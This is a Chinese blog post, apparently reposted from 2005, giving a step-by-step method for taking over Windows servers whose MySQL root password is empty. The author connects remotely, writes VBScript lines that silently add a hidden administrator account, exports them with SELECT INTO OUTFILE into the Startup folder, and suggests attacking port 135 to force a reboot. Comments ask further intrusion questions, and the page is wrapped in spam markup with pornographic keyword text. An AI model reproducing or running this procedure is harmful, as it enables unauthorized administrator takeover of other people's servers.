• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
  • MYSQL用戶root密碼為空攻擊方法

    發表于:2007-05-25來源:作者:點擊數: 標簽:MySQL用戶方法root密碼
    文章來源:sevenline 在網上我也找到一些利用此漏洞的方法,一般就是寫一個ASP或 PHP 的后門,不僅很麻煩,而且還要猜解網站的目錄,如果對方沒有開IIS,那我們豈不沒辦法了?? 后來,自己思索想到一個辦法,在我 測試 的幾臺有此漏洞的機中均獲得了成功,現
    文章來源:sevenline

    在網上我也找到一些利用此漏洞的方法,一般就是寫一個ASP或PHP的后門,不僅很麻煩,而且還要猜解網站的目錄,如果對方沒有開IIS,那我們豈不沒辦法了??


     

       后來,自己思索想到一個辦法,在我測試的幾臺有此漏洞的機中均獲得了成功,現將我的攻擊方法公布如下:

    文章來源:sevenline

    在網上我也找到一些利用此漏洞的方法,一般就是寫一個ASP或PHP的后門,不僅很麻煩,而且還要猜解網站的目錄,如果對方沒有開IIS,那我們豈不沒辦法了??


     

       后來,自己思索想到一個辦法,在我測試的幾臺有此漏洞的機中均獲得了成功,現將我的攻擊方法公布如下:

      

       1、連接到對方MYSQL 服務器

       mysql -u root -h 192.168.0.1

       mysql.exe 這個程序在你安裝了MYSQL的的BIN目錄中

       2、讓我們來看看服務器中有些什么數據庫

       mysql>show databases;

       MYSQL默認安裝時會有MYSQL、TEST這兩個數據庫,如果你看到有其它的數據庫那么就是用戶自建的數據庫。

       3、讓我們進入數據庫

       mysql>use test;

       我們將會進入test數據庫中

       4、查看我們進入數據庫中有些什么數據表

       mysql>show tables;

       默認的情況下,test中沒有任何表的存在。

       以下為關鍵的部分

       5、在TEST數據庫下創建一個新的表;

       mysql>create table a (cmd text);

       好了,我們創建了一個新的表,表名為a,表中只存放一個字段,字段名為cmd,為text文本。

       6、在表中插入內容

       mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );

       mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user zjl317 zjl317 /add"",0) " );

       mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators zjl317 /add"",0) " );

       注意雙引號和括號以及后面的"0"一定要輸入!我們將用這三條命令來建立一個VBS的腳本程序!

       7、好了,現在我們來看看表a中有些什么

       mysql>select * from a;

       我們將會看到表中有三行數據,就是我們剛剛輸入的內容,確認你輸入的內容無誤后,我們來到下一步

       8、輸出表為一個VBS的腳本文件

       mysql>select * from a into outfile "c:\docume~1\alluse~1\「開始」菜單\程序\啟動\a.vbs";

       我們把我們表中的內容輸入到啟動組中,是一個VBS的腳本文件!注意""符號。

       9、看到這大家肯定知道了,就是利用MYSQL輸出一個可執行的文件而已。為什么不用BAT呢,因為啟動運行時會有明顯的DOS窗口出來,而用VBS腳本則可以完全隱藏窗口且不會有錯誤提示!本來,應該還有一句完成腳本后自動刪除此腳本的,但是中文目錄實在無法處理,只有作罷!好了,找個工具攻擊135讓服務器重啟吧,幾分鐘以后你就是管理員了。

    - 作者: javascript:void(0);">極度郁悶 2005年02月26日, 星期六 10:51 加入博采

    Trackback

    你可以使用這個鏈接引用該篇文章 http://publishblog.blogchina.com/blog/tb.b?diaryID=822912

    回復

    - 評論人:極度郁悶

    Wed Apr 27 18:31:42 CST 2005  作者郵箱  作者Blog

    那要看你想做什么了。。。

    - 評論人:匿名網友

    Sat Mar 19 19:14:51 CST 2005 

    菜鳥提問:有了管理員口令 可目標機器沒有開ipc 怎么辦


    - 評論人:匿名網友

    Mon Mar 07 10:02:20 CST 2005 

    root密碼都為空了,那服務器一般不會做設置禁止連接的嘿嘿

    - 評論人:simon

    Sun Mar 06 23:58:02 CST 2005  作者Blog

    mysql -u root -h 192.168.0.1

    不是禁止遠程連接嗎?

    原文轉自:http://www.kjueaiud.com

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>